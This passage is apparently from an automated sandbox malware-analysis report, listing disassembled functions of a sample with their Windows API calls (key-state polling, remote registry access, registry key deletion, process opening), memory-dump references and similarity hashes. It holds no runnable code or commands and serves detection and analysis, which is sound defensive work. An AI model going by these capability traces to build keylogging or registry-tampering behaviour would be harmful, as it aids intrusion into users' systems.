                                                                                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1589278365-1403004172
                                                                                              • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                              • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                              Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle
                                                                                              • String ID: nul
                                                                                              • API String ID: 2519475695-2873401336
                                                                                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                              Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle
                                                                                              • String ID: nul
                                                                                              • API String ID: 2519475695-2873401336
                                                                                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                              Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 0-1011021900
                                                                                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                              Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                              • GetFocus.USER32 ref: 0046157B
                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                              • __swprintf.LIBCMT ref: 00461608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                              • String ID: %s%d
                                                                                              • API String ID: 2645982514-1110647743
                                                                                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                              Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                              Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                              • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                              Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConnectRegistry_memmove_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 15295421-0
                                                                                              • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                              • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                              • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                              • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                              Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 004563A6
                                                                                              • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                              • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3539004672-0
                                                                                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                              Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 327565842-0
                                                                                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                              Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                              • String ID:
                                                                                              • API String ID: 2832842796-0
                                                                                              • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                              • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                              Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2095303065-0
                                                                                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                              Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: RectWindow
                                                                                              • String ID:
                                                                                              • API String ID: 861336768-0
                                                                                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                              Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32 ref: 00449598
                                                                                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                              • _wcslen.LIBCMT ref: 0044960D
                                                                                              • _wcslen.LIBCMT ref: 0044961A
                                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                              • String ID:
                                                                                              • API String ID: 1856069659-0
                                                                                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
